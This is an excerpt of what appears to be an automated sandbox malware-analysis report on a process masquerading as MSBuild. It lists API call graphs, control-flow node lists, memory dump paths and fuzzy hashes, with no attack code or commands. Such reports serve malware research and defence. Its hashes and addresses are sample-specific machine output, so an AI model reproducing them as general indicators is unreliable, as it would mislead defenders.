GetModuleHandleW 21333->21334 21339 a972c5 21333->21339 21335 a9724b 21334->21335 21336 a94c14 GetModuleHandleW 21335->21336 21335->21339 21337 a97299 21336->21337 21338 a94c14 GetModuleHandleW 21337->21338 21337->21339 21338->21339 21339->21327 21341 a970e5 21340->21341 21342 a94c14 GetModuleHandleW 21341->21342 21343 a97109 21341->21343 21342->21343 21344 a94c14 GetModuleHandleW 21343->21344 21349 a972c5 21343->21349 21345 a9724b 21344->21345 21346 a94c14 GetModuleHandleW 21345->21346 21345->21349 21347 a97299 21346->21347 21348 a94c14 GetModuleHandleW 21347->21348 21347->21349 21348->21349 21349->21327 21357 a94dcc 21350->21357 21354 a978e0 21353->21354 21355 a94dcc CreateWindowExW 21354->21355 21356 a97915 21355->21356 21356->21290 21358 a97930 CreateWindowExW 21357->21358 21360 a97a54 21358->21360 21440 a9c238 21441 a9c260 21440->21441 21444 a9c28c 21440->21444 21442 a9c269 21441->21442 21445 a9b704 21441->21445 21446 a9b70f 21445->21446 21447 a9c583 21446->21447 21449 a9b720 21446->21449 21447->21444 21450 a9c5b8 OleInitialize 21449->21450 21451 a9c61c 21450->21451 21451->21447 21361 c2d044 21362 c2d05c 21361->21362 21363 c2d0b6 21362->21363 21370 a98839 21362->21370 21380 a97ad7 21362->21380 21386 a94df4 21362->21386 21394 a94de4 21362->21394 21398 a97c11 21362->21398 21406 a97ae8 21362->21406 21371 a988a8 21370->21371 21373 a98842 21370->21373 21422 a94f1c 21371->21422 21374 a988a9 21373->21374 21377 a98899 21373->21377 21375 a988a7 21374->21375 21376 a94f1c CallWindowProcW 21374->21376 21376->21375 21412 a989c0 21377->21412 21417 a989d0 21377->21417 21381 a97b0e 21380->21381 21382 a94de4 GetModuleHandleW 21381->21382 21383 a97b1a 21382->21383 21384 a94df4 CallWindowProcW 21383->21384 21385 a97b2f 21384->21385 21385->21363 21387 a94dff 21386->21387 21388 a988a9 21387->21388 21390 a98899 21387->21390 21389 a94f1c CallWindowProcW 21388->21389 21391 a988a7 21388->21391 21389->21391 21392 a989c0 CallWindowProcW 21390->21392 21393 a989d0 CallWindowProcW 21390->21393 21392->21391 21393->21391 21395 a94def 21394->21395 21436 a94e1c 21395->21436 21397 a97c27 21397->21363 21399 a97c0d 21398->21399 21400 a97c1a 21398->21400 21399->21398 21403 a97c82 21399->21403 21401 a94e1c GetModuleHandleW 21400->21401 21402 a97c27 21401->21402 21402->21363 21404 a94c14 GetModuleHandleW 21403->21404 21405 a97cf8 21403->21405 21404->21405 21407 a97b0e 21406->21407 21408 a94de4 GetModuleHandleW 21407->21408 21409 a97b1a 21408->21409 21410 a94df4 CallWindowProcW 21409->21410 21411 a97b2f 21410->21411 21411->21363 21414 a989d0 21412->21414 21413 a98a70 21413->21375 21426 a98a79 21414->21426 21429 a98a88 21414->21429 21419 a989e4 21417->21419 21418 a98a70 21418->21375 21420 a98a79 CallWindowProcW 21419->21420 21421 a98a88 CallWindowProcW 21419->21421 21420->21418 21421->21418 21423 a94f27 21422->21423 21424 a9a10a CallWindowProcW 21423->21424 21425 a9a0b9 21423->21425 21424->21425 21425->21375 21427 a98a99 21426->21427 21432 a9a042 21426->21432 21427->21413 21430 a98a99 21429->21430 21431 a9a042 CallWindowProcW 21429->21431 21430->21413 21431->21430 21433 a9a04d 21432->21433 21434 a94f1c CallWindowProcW 21433->21434 21435 a9a05a 21434->21435 21435->21427 21437 a94e27 21436->21437 21438 a94c14 GetModuleHandleW 21437->21438 21439 a97cf8 21437->21439 21438->21439

                                                                                                                              Executed Functions

                                                                                                                              Function 00CBC73F Relevance: 3.9, Strings: 3, Instructions: 182COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 cbc73f-cbc768 1 cbc76a 0->1 2 cbc76f-cbc84c call cb41a0 call cb3cc0 0->2 1->2 12 cbc84e 2->12 13 cbc853-cbc874 call cb5658 2->13 12->13 15 cbc879-cbc884 13->15 16 cbc88b-cbc88f 15->16 17 cbc886 15->17 18 cbc891-cbc892 16->18 19 cbc894-cbc89b 16->19 17->16 20 cbc8b3-cbc8f7 18->20 21 cbc89d 19->21 22 cbc8a2-cbc8b0 19->22 26 cbc95d-cbc974 20->26 21->22 22->20 28 cbc8f9-cbc90f 26->28 29 cbc976-cbc99b 26->29 33 cbc939 28->33 34 cbc911-cbc91d 28->34 35 cbc99d-cbc9b2 29->35 36 cbc9b3 29->36 39 cbc93f-cbc95c 33->39 37 cbc91f-cbc925 34->37 38 cbc927-cbc92d 34->38 35->36 40 cbc937 37->40 38->40 39->26 40->39
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: aff627e13e80c7ee29df9a06226927d76087d55c9aaa5b8b38bf7ddcd1544844
                                                                                                                              • Instruction ID: 8422acad53f5456aad31e8d929aff2bbbe1f65da5d64d09061aaa1ad9bcdae3f
                                                                                                                              • Opcode Fuzzy Hash: aff627e13e80c7ee29df9a06226927d76087d55c9aaa5b8b38bf7ddcd1544844
                                                                                                                              • Instruction Fuzzy Hash: 94819074E00218DFEB14DFAAD984ADDBBF2BF88300F248069E419AB365DB359941DF50
                                                                                                                              Function 00CBC1A7 Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 44 cbc1a7-cbc1c8 45 cbc1ca 44->45 46 cbc1cf-cbc2ac call cb41a0 call cb3cc0 44->46 45->46 56 cbc2ae 46->56 57 cbc2b3-cbc2d4 call cb5658 46->57 56->57 59 cbc2d9-cbc2e4 57->59 60 cbc2eb-cbc2ef 59->60 61 cbc2e6 59->61 62 cbc2f1-cbc2f2 60->62 63 cbc2f4-cbc2fb 60->63 61->60 64 cbc313-cbc357 62->64 65 cbc2fd 63->65 66 cbc302-cbc310 63->66 70 cbc3bd-cbc3d4 64->70 65->66 66->64 72 cbc359-cbc36f 70->72 73 cbc3d6-cbc3fb 70->73 77 cbc399 72->77 78 cbc371-cbc37d 72->78 79 cbc3fd-cbc412 73->79 80 cbc413 73->80 83 cbc39f-cbc3bc 77->83 81 cbc37f-cbc385 78->81 82 cbc387-cbc38d 78->82 79->80 84 cbc397 81->84 82->84 83->70 84->83
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 180a20e4593c2d84045706d481a872bb2aa2a735bd2ca0590204d586fe032110
                                                                                                                              • Instruction ID: 352b105ec77146a31fa5c32d2b3f79bebce7a55605b37b7285207972ec42083b
                                                                                                                              • Opcode Fuzzy Hash: 180a20e4593c2d84045706d481a872bb2aa2a735bd2ca0590204d586fe032110
                                                                                                                              • Instruction Fuzzy Hash: 1F818074E00618CFDB14DFAAD884ADDBBF2BF88300F248069E419AB365DB749941DF50
                                                                                                                              Function 00CBD284 Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 220 cbd284-cbd2a8 221 cbd2aa 220->221 222 cbd2af-cbd38c call cb41a0 call cb3cc0 220->222 221->222 232 cbd38e 222->232 233 cbd393-cbd3b4 call cb5658 222->233 232->233 235 cbd3b9-cbd3c4 233->235 236 cbd3cb-cbd3cf 235->236 237 cbd3c6 235->237 238 cbd3d1-cbd3d2 236->238 239 cbd3d4-cbd3db 236->239 237->236 240 cbd3f3-cbd437 238->240 241 cbd3dd 239->241 242 cbd3e2-cbd3f0 239->242 246 cbd49d-cbd4b4 240->246 241->242 242->240 248 cbd439-cbd44f 246->248 249 cbd4b6-cbd4db 246->249 253 cbd479 248->253 254 cbd451-cbd45d 248->254 256 cbd4dd-cbd4f2 249->256 257 cbd4f3 249->257 255 cbd47f-cbd49c 253->255 258 cbd45f-cbd465 254->258 259 cbd467-cbd46d 254->259 255->246 256->257 260 cbd477 258->260 259->260 260->255
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 71e1eef7883933062af1c7c5740c9928f6e11765f8b082413fd9c343954997ba
                                                                                                                              • Instruction ID: 2e553053fb9e862f8cb865d43813b418d30cc6929965d8699319d83478714477
                                                                                                                              • Opcode Fuzzy Hash: 71e1eef7883933062af1c7c5740c9928f6e11765f8b082413fd9c343954997ba
                                                                                                                              • Instruction Fuzzy Hash: 92819374E00658CFDB14DFAAD884ADDBBF2BF88310F248069E419AB365EB349941CF51
                                                                                                                              Function 00CBC477 Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 88 cbc477-cbc498 89 cbc49a 88->89 90 cbc49f-cbc57c call cb41a0 call cb3cc0 88->90 89->90 100 cbc57e 90->100 101 cbc583-cbc5a4 call cb5658 90->101 100->101 103 cbc5a9-cbc5b4 101->103 104 cbc5bb-cbc5bf 103->104 105 cbc5b6 103->105 106 cbc5c1-cbc5c2 104->106 107 cbc5c4-cbc5cb 104->107 105->104 108 cbc5e3-cbc627 106->108 109 cbc5cd 107->109 110 cbc5d2-cbc5e0 107->110 114 cbc68d-cbc6a4 108->114 109->110 110->108 116 cbc629-cbc63f 114->116 117 cbc6a6-cbc6cb 114->117 121 cbc669 116->121 122 cbc641-cbc64d 116->122 123 cbc6cd-cbc6e2 117->123 124 cbc6e3 117->124 127 cbc66f-cbc68c 121->127 125 cbc64f-cbc655 122->125 126 cbc657-cbc65d 122->126 123->124 128 cbc667 125->128 126->128 127->114 128->127
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 636a8e08809eaf63c4f0247992f8c60bbcdeef598f00965f0fb301baae6f5516
                                                                                                                              • Instruction ID: 3bedf229abe0da3fafeb08dc953982d4831f739294b1b87d5033458b6724d451
                                                                                                                              • Opcode Fuzzy Hash: 636a8e08809eaf63c4f0247992f8c60bbcdeef598f00965f0fb301baae6f5516
                                                                                                                              • Instruction Fuzzy Hash: BF81A374E00218DFDB14DFAAD984ADDBBF2BF88300F249169E419AB365DB349941DF50
                                                                                                                              Function 00CBCCE7 Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 132 cbcce7-cbcd08 133 cbcd0a 132->133 134 cbcd0f-cbcdec call cb41a0 call cb3cc0 132->134 133->134 144 cbcdee 134->144 145 cbcdf3-cbce14 call cb5658 134->145 144->145 147 cbce19-cbce24 145->147 148 cbce2b-cbce2f 147->148 149 cbce26 147->149 150 cbce31-cbce32 148->150 151 cbce34-cbce3b 148->151 149->148 152 cbce53-cbce97 150->152 153 cbce3d 151->153 154 cbce42-cbce50 151->154 158 cbcefd-cbcf14 152->158 153->154 154->152 160 cbce99-cbceaf 158->160 161 cbcf16-cbcf3b 158->161 165 cbced9 160->165 166 cbceb1-cbcebd 160->166 168 cbcf3d-cbcf52 161->168 169 cbcf53 161->169 167 cbcedf-cbcefc 165->167 170 cbcebf-cbcec5 166->170 171 cbcec7-cbcecd 166->171 167->158 168->169 172 cbced7 170->172 171->172 172->167
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 12fa71fed8187e8a29864173b888f33f19ee7b3ecad2c1295a2b58700c20526b
                                                                                                                              • Instruction ID: 9f1a03c2fb1a355958011d184312cb7283fca4bde18468615db3a35b03ea07c3
                                                                                                                              • Opcode Fuzzy Hash: 12fa71fed8187e8a29864173b888f33f19ee7b3ecad2c1295a2b58700c20526b
                                                                                                                              • Instruction Fuzzy Hash: B9819274E00658DFDB14DFAAD984ADDBBF2BF88300F248069E419AB365DB349981CF50
                                                                                                                              Function 00CBCFB7 Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 176 cbcfb7-cbcfd8 177 cbcfda 176->177 178 cbcfdf-cbd0bc call cb41a0 call cb3cc0 176->178 177->178 188 cbd0be 178->188 189 cbd0c3-cbd0e4 call cb5658 178->189 188->189 191 cbd0e9-cbd0f4 189->191 192 cbd0fb-cbd0ff 191->192 193 cbd0f6 191->193 194 cbd101-cbd102 192->194 195 cbd104-cbd10b 192->195 193->192 196 cbd123-cbd167 194->196 197 cbd10d 195->197 198 cbd112-cbd120 195->198 202 cbd1cd-cbd1e4 196->202 197->198 198->196 204 cbd169-cbd17f 202->204 205 cbd1e6-cbd20b 202->205 209 cbd1a9 204->209 210 cbd181-cbd18d 204->210 211 cbd20d-cbd222 205->211 212 cbd223 205->212 215 cbd1af-cbd1cc 209->215 213 cbd18f-cbd195 210->213 214 cbd197-cbd19d 210->214 211->212 216 cbd1a7 213->216 214->216 215->202 216->215
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: bd073bb170d568810c32a955388c15a442452830028a3c540876173c73514df2
                                                                                                                              • Instruction ID: 5b9a3b8d807ae659d16e8dde8cccb1bb2e5a5e19a7af732e28f8876ef5682f24
                                                                                                                              • Opcode Fuzzy Hash: bd073bb170d568810c32a955388c15a442452830028a3c540876173c73514df2
                                                                                                                              • Instruction Fuzzy Hash: 8A81B474E00658CFDB14DFAAD884ADDBBF2BF88310F248069E419AB365EB349941CF10
                                                                                                                              Function 00CB5381 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op
                                                                                                                              • API String ID: 0-2001708241
                                                                                                                              • Opcode ID: 860992523ed9747729fa5b61de05597446a874ec7537c9c15c05700273ae75df
                                                                                                                              • Instruction ID: 427015eafd14d599f7f9c5bd06199f1fd1f1f541aa3d8900d9999aef1941a877
                                                                                                                              • Opcode Fuzzy Hash: 860992523ed9747729fa5b61de05597446a874ec7537c9c15c05700273ae75df
                                                                                                                              • Instruction Fuzzy Hash: 24619474E006489FDB18DFAAD944ADDBBF2BF88301F14C069D819AB365DB349945CF50
                                                                                                                              Function 00CBCA19 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op
                                                                                                                              • API String ID: 0-2001708241
                                                                                                                              • Opcode ID: bd028b911814812178a29a38b6fdeb05b9675fcddf6933da33c57011102eff64
                                                                                                                              • Instruction ID: cffb0fc4a57bfdf57235b63b17b7a7e97659feb83ce20142e0b2e76cd4c64252
                                                                                                                              • Opcode Fuzzy Hash: bd028b911814812178a29a38b6fdeb05b9675fcddf6933da33c57011102eff64
                                                                                                                              • Instruction Fuzzy Hash: BC51A575E006489FDB18DFAAD984ADEBBF2BF88300F14C069E418AB365DB349941DF50
                                                                                                                              Function 00CB9DE0 Relevance: 1.1, Instructions: 1133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eb51cd1a0ad3f157ca0bba4d1464c2e6c8ac393223107bd7172037f1ccc63c1b
                                                                                                                              • Instruction ID: e65513a4d099afdf7fb9ca75368cf4c7f38c6c98b76c052285dab1284e46eddc
                                                                                                                              • Opcode Fuzzy Hash: eb51cd1a0ad3f157ca0bba4d1464c2e6c8ac393223107bd7172037f1ccc63c1b
                                                                                                                              • Instruction Fuzzy Hash: B0A27C70A00209DFCB15CFA8C584AEEBBF2BF88300F158569E455DB2A5D731ED85DB62
                                                                                                                              Function 00CB69A0 Relevance: .5, Instructions: 513COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a7ba4ded8620bf51ab037f2365311fe51712c8a600d3bf2363919b3d4bae26d4
                                                                                                                              • Instruction ID: 96d342b756eb795c5ada10e9d01e409a226110728a7c8884a966458eb63aa800
                                                                                                                              • Opcode Fuzzy Hash: a7ba4ded8620bf51ab037f2365311fe51712c8a600d3bf2363919b3d4bae26d4
                                                                                                                              • Instruction Fuzzy Hash: CB128B70A00209CFDB14DF69C894AAEBBF6BF88300F248569E815DB395DF349E45DB90
                                                                                                                              Function 00CB6FC8 Relevance: .4, Instructions: 450COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b7b38d7f943f222598c49a7148076cac979af2445d4cdd7f39b1f2de4d143a89
                                                                                                                              • Instruction ID: ff21d1f9cc853092898c740e69f25ecba3f1e3f97ce1538c8fd8a3f71ee4888a
                                                                                                                              • Opcode Fuzzy Hash: b7b38d7f943f222598c49a7148076cac979af2445d4cdd7f39b1f2de4d143a89
                                                                                                                              • Instruction Fuzzy Hash: 88025E30A04209DFCB15CFA9D984AEEBBF2BF88301F158566E815AB261D730DE45DF51
                                                                                                                              Function 00CBE988 Relevance: .1, Instructions: 147COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e91b5bb5d43d56a01dbc453a43818c16ab1999b581455eb2b5aeaaccb6849a79
                                                                                                                              • Instruction ID: fd49772486d75f2a66a57c742177226fdc8528e6aea490abf408795e688b5bc9
                                                                                                                              • Opcode Fuzzy Hash: e91b5bb5d43d56a01dbc453a43818c16ab1999b581455eb2b5aeaaccb6849a79
                                                                                                                              • Instruction Fuzzy Hash: E0518274E00608DFDB18DFAAD894A9DBBF6BF89700F248129E815AB365DB309941CF54
                                                                                                                              Function 00CBE987 Relevance: .1, Instructions: 143COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ec292f5ff073df66fb4fc288fdd9ac16d9a795a4d49dd42afe02c60055c57b8
                                                                                                                              • Instruction ID: df5a5abd6970af3b607676ee8e507c73630fefc8237b43d965b67f2b7ef7a8b4
                                                                                                                              • Opcode Fuzzy Hash: 9ec292f5ff073df66fb4fc288fdd9ac16d9a795a4d49dd42afe02c60055c57b8
                                                                                                                              • Instruction Fuzzy Hash: 10519374E00208DFDB18DFAAD894ADDBBB2BF88700F248129E815BB365DB305941CF14
                                                                                                                              Function 00CBCA0C Relevance: 3.9, Strings: 3, Instructions: 156COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 264 cbca0c-cbca14 265 cbca6d-cbcb1c call cb41a0 call cb3cc0 264->265 266 cbca16 264->266 276 cbcb1e 265->276 277 cbcb23-cbcb44 call cb5658 265->277 266->265 276->277 279 cbcb49-cbcb54 277->279 280 cbcb5b-cbcb5f 279->280 281 cbcb56 279->281 282 cbcb61-cbcb62 280->282 283 cbcb64-cbcb6b 280->283 281->280 284 cbcb83-cbcbc7 282->284 285 cbcb6d 283->285 286 cbcb72-cbcb80 283->286 290 cbcc2d-cbcc44 284->290 285->286 286->284 292 cbcbc9-cbcbdf 290->292 293 cbcc46-cbcc6b 290->293 296 cbcc09 292->296 297 cbcbe1-cbcbed 292->297 299 cbcc6d-cbcc82 293->299 300 cbcc83 293->300 303 cbcc0f-cbcc2c 296->303 301 cbcbef-cbcbf5 297->301 302 cbcbf7-cbcbfd 297->302 299->300 306 cbcc84 300->306 304 cbcc07 301->304 302->304 303->290 304->303 306->306
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 359e9f54e9346d67fb37b27d4f9ab1a877e9d05e2f95a5bc15665ebf99bc3187
                                                                                                                              • Instruction ID: cff5e19ed20623c8c22be981be38484ed7c42f8772c5775b2bb772ff1d2d9c58
                                                                                                                              • Opcode Fuzzy Hash: 359e9f54e9346d67fb37b27d4f9ab1a877e9d05e2f95a5bc15665ebf99bc3187
                                                                                                                              • Instruction Fuzzy Hash: B971A174E00258CFDB14DFA9D884ADDBBB2BF49310F2480A9E859AB365DB349D81DF50
                                                                                                                              Function 00A95750 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 309 a95750-a9575f 310 a9578b-a9578f 309->310 311 a95761-a9576e call a94c14 309->311 313 a95791-a9579b 310->313 314 a957a3-a957e4 310->314 316 a95770 311->316 317 a95784 311->317 313->314 320 a957f1-a957ff 314->320 321 a957e6-a957ee 314->321 365 a95776 call a959e8 316->365 366 a95776 call a959d8 316->366 317->310 322 a95801-a95806 320->322 323 a95823-a95825 320->323 321->320 326 a95808-a9580f call a94c20 322->326 327 a95811 322->327 325 a95828-a9582f 323->325 324 a9577c-a9577e 324->317 328 a958c0-a95980 324->328 330 a9583c-a95843 325->330 331 a95831-a95839 325->331 332 a95813-a95821 326->332 327->332 358 a95988-a959b3 GetModuleHandleW 328->358 359 a95982-a95985 328->359 335 a95850-a95859 330->335 336 a95845-a9584d 330->336 331->330 332->325 339 a9585b-a95863 335->339 340 a95866-a9586b 335->340 336->335 339->340 342 a95889-a9588d 340->342 343 a9586d-a95874 340->343 363 a95890 call a95c99 342->363 364 a95890 call a95ca8 342->364 343->342 344 a95876-a95886 call a92ce4 call a94c30 343->344 344->342 346 a95893-a95896 349 a958b9-a958bf 346->349 350 a95898-a958b6 346->350 350->349 360 a959bc-a959d0 358->360 361 a959b5-a959bb 358->361 359->358 361->360 363->346 364->346 365->324 366->324
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 263a2ed0aa1973d4006104e6f698b08485d4a0e0f0d8406ce9b467da61718d23
                                                                                                                              • Instruction ID: d5bdef5fb380dea5c2852a41623379385e1ca1287fcf857e0d547730cfcb2a74
                                                                                                                              • Opcode Fuzzy Hash: 263a2ed0aa1973d4006104e6f698b08485d4a0e0f0d8406ce9b467da61718d23
                                                                                                                              • Instruction Fuzzy Hash: E8712470A00B058FDB25DF7AD44175ABBF1BF88314F00892DD58ADBA50DB75E946CB90
                                                                                                                              Function 00A97924 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 367 a97924-a9792c 368 a9795e-a97996 367->368 369 a9792e-a97957 367->369 370 a97998-a9799e 368->370 371 a979a1-a979a8 368->371 369->368 370->371 372 a979aa-a979b0 371->372 373 a979b3-a979eb 371->373 372->373 374 a979f3-a97a52 CreateWindowExW 373->374 375 a97a5b-a97a93 374->375 376 a97a54-a97a5a 374->376 380 a97aa0 375->380 381 a97a95-a97a98 375->381 376->375 382 a97aa1 380->382 381->380 382->382
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00A97A42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 5b001a8c9f4a8cf1a838e1549a433911958815140e60c98c3cd18e085cca3a83
